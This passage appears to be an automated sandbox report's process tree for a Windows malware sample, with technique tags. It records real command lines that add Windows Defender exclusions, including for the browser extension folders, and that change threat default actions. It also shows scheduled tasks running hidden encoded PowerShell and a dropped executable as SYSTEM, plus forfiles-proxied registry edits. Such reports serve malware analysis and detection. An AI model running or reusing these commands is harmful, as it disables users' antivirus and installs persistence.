                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:1108
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:1676
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                        PID:6604
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4988
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:1208
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:6244
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                              PID:2800
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:1108
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:1676
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  PID:6604
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DdGenroKuMUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DdGenroKuMUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DfohqrWuQwzjvvzxRXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DfohqrWuQwzjvvzxRXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KzDHahyhCgTU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KzDHahyhCgTU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jgfFqNDpU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jgfFqNDpU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tGUMufluaQZXC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tGUMufluaQZXC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\bTzCNmotopxUflVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\bTzCNmotopxUflVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ctqnBHKEtvrukUWPS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ctqnBHKEtvrukUWPS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kDKKovSdrktZBFxZ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kDKKovSdrktZBFxZ\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                PID:2540
                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:5576
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DdGenroKuMUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                    PID:4172
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DdGenroKuMUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:7008
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DdGenroKuMUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:6928
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DfohqrWuQwzjvvzxRXR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:5020
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DfohqrWuQwzjvvzxRXR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:120
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KzDHahyhCgTU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:5876
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KzDHahyhCgTU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                          PID:3104
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgfFqNDpU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                          PID:1920
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgfFqNDpU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:6336
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tGUMufluaQZXC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                            PID:2800
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tGUMufluaQZXC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                            PID:1108
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\bTzCNmotopxUflVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:796
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\bTzCNmotopxUflVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4296
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:3092
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:6240
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:6260
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:6112
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ctqnBHKEtvrukUWPS /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:844
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ctqnBHKEtvrukUWPS /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:2808
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\kDKKovSdrktZBFxZ /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:852
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\kDKKovSdrktZBFxZ /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:5028
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "gnJgbmIzs" /SC once /ST 03:31:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                              PID:1928
                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:1636
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                schtasks /run /I /tn "gnJgbmIzs"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:1040
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:7008
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "gnJgbmIzs"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:1040
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "PUMkfLMhQCQOejXrQ" /SC once /ST 03:06:07 /RU "SYSTEM" /TR "\"C:\Windows\Temp\kDKKovSdrktZBFxZ\NWWhlXgmRWHPQbN\RJhOwpL.exe\" wQ /ZkyDdidNH 385104 /S" /V1 /F
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                      PID:852
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                      schtasks /run /I /tn "PUMkfLMhQCQOejXrQ"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:3380
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:120
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 840
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:7056
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:4380
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                          PID:6928
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:5020
                                                                                                                                                                                                                                                                                          • C:\Windows\Temp\kDKKovSdrktZBFxZ\NWWhlXgmRWHPQbN\RJhOwpL.exe
                                                                                                                                                                                                                                                                                            C:\Windows\Temp\kDKKovSdrktZBFxZ\NWWhlXgmRWHPQbN\RJhOwpL.exe wQ /ZkyDdidNH 385104 /S
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:6880
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:1252
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                                                                                                                                                                    PID:3088
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:6536
                                                                                                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:2936
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                                                                                                                                                                        PID:2360
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:3832
                                                                                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:4440
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                                                                                                                                            PID:5652
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:1328
                                                                                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:1520
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                PID:444
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                    PID:3004
                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:2164
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                    PID:6820
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:4184
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                                          5⤵
